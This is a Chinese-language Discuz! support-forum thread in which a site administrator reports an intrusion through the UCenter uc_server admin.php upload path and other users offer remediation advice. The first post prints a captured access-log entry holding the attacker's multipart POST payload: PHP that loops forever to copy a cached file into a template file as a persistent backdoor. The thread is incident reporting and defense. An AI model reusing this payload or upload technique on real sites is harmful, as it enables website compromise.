Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

uc_service上传漏洞

[复制链接]
iTouch_sS2Tt 发表于 2017-11-7 14:58:03 | 显示全部楼层 |阅读模式
[06/Nov/2017:20:56:22 +0800] 500 0.768 172.104.117.118 "POST /uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q HTTP/1.1" 100332 "http://www.abc.com/uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0" "m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q" "-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A/data/www/abc/abc.com/data/template/\x0D\x0A-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22upfile\x22; filename=\x22New Text Document (20).txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<?php\x0D\x0Aignore_user_abort(true);\x0D\x0Aset_time_limit(0);\x0D\x0Awhile(1) {\x0D\x0A$file = '/data/www/abc/abc.com/data/cache/9';\x0D\x0A$newfile = '/data/www/abc/abc.com/data/template/4_qqconnect_module.tpl.php';\x0D\x0Achmod($newfile,0777);\x0D\x0Aif (!copy($file, $newfile)) {\x0D\x0A    echo \x22\x22;\x0D\x0A}\x0D\x0Achmod(\x22/data/www/abc/abc.com/data/template/4_qqconnect_module.tpl.php\x22,0444);\x0D\x0Asleep(100); //\xE5\x8D\x8A\xE5\xB0\x8F\xE6\x97\xB6\xE6\x89\xA7\xE8\xA1\x8C\xE4\xB8\x80\xE6\xAC\xA1\x0D\x0A}\x0D\x0A?>\x0D\x0A\x0D\x0A-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22rename\x22\x0D\x0A\x0D\x0A4_qqconnect_module.tpl.php\x0D\x0A-----------------------------64261247712478--\x0D\x0A"

通过uc_server/admin.php?m=app&这样的地址以Content-Disposition: form-data的方式上传代码入侵。先将恶意代码写人cache目录再将其copy到data/template目录的缓存模板中形成后门。更多的日志记录信息希望版主联系我私聊


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
 楼主| iTouch_sS2Tt 发表于 2017-11-7 15:08:11 | 显示全部楼层

IN_UCKEY被利用

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

民审大大 发表于 2017-11-7 15:30:15 | 显示全部楼层

升级最新版吧,UCKEY的漏洞修复都很久了,并且要利用这类漏洞前,别人首先已经通过其他漏洞拿到过你网站的UCKEY,所以UCKEY也得修改
回复

使用道具 举报

 楼主| iTouch_sS2Tt 发表于 2017-11-7 15:52:57 | 显示全部楼层
民审大大 发表于 2017-11-7 15:30
升级最新版吧,UCKEY的漏洞修复都很久了,并且要利用这类漏洞前,别人首先已经通过其他漏洞拿到过你网站 ...

民审大大  这个漏洞我已经补上了,并且我对代码已经做了监控了。现在的情况是他根本没有动我的核心代码,只是修改data目录下的 cache 或者 template等可写目录,尤其是template下的文件会被引用到核心代码中,他以此就形成后门了。大大!!
回复

使用道具 举报

民审大大 发表于 2017-11-7 16:19:50 | 显示全部楼层
iTouch_sS2Tt 发表于 2017-11-7 15:52
民审大大  这个漏洞我已经补上了,并且我对代码已经做了监控了。现在的情况是他根本没有动我的核心代码, ...

建议你找人彻底查下是不是有残留的后门
回复

使用道具 举报

 楼主| iTouch_sS2Tt 发表于 2017-11-7 17:32:21 | 显示全部楼层
民审大大 发表于 2017-11-7 16:19
建议你找人彻底查下是不是有残留的后门

民审大大  我已经通过git的方式对代码做过对比了  哎。。。头疼 还要忙别的事
回复

使用道具 举报

dffdsdf删掉 发表于 2017-11-7 19:45:55 | 显示全部楼层
真的是bug啊
回复

使用道具 举报

 楼主| iTouch_sS2Tt 发表于 2017-11-8 15:29:25 | 显示全部楼层
民审大大 发表于 2017-11-7 16:19
建议你找人彻底查下是不是有残留的后门

我仔细看日志 排查了一下,应该是 UCKEY泄露 导致被利用 ,做了修改出来(漏洞是早就修复了的),,但始终还是有个奇怪的地方,通过日志信息发现 他可以通过POST   /uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q  这样的路径实现上传文件的动作。。我有时间还会继续追查一下。。并且可以实现www用户的提权操作也是一直百思不得其解
回复

使用道具 举报

coolhey 发表于 2017-11-13 12:18:56 | 显示全部楼层
本帖最后由 coolhey 于 2017-11-13 12:23 编辑
iTouch_sS2Tt 发表于 2017-11-8 15:29
我仔细看日志 排查了一下,应该是 UCKEY泄露 导致被利用 ,做了修改出来(漏洞是早就修复了的),,但始 ...


请教一下这位兄台,我也遇到了同样的问题,被挂马了,版本X3.2,管理员密码被修改,阿里云安骑士删掉后木马后,今天又被挂马了。头痛不知道怎么处理。

阿里云服务器,win2003, IIS6.0,服务器上有网站安全狗和阿里云自带的安骑士。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

 楼主| iTouch_sS2Tt 发表于 2017-11-13 13:46:17 | 显示全部楼层
coolhey 发表于 2017-11-13 12:18
请教一下这位兄台,我也遇到了同样的问题,被挂马了,版本X3.2,管理员密码被修改,阿里云安骑士删掉后 ...

这个漏洞已经找到了,请见我发的bug帖。你如果对服务器配置熟悉,可以把UCcenter的后台管理地址禁止外网访问。。。简单粗暴的方法是把UCcenter下的admin.php移除,需要的时候再移过来。。。当然最后还是需要再清理一下木马
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-24 04:14 , Processed in 0.031804 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表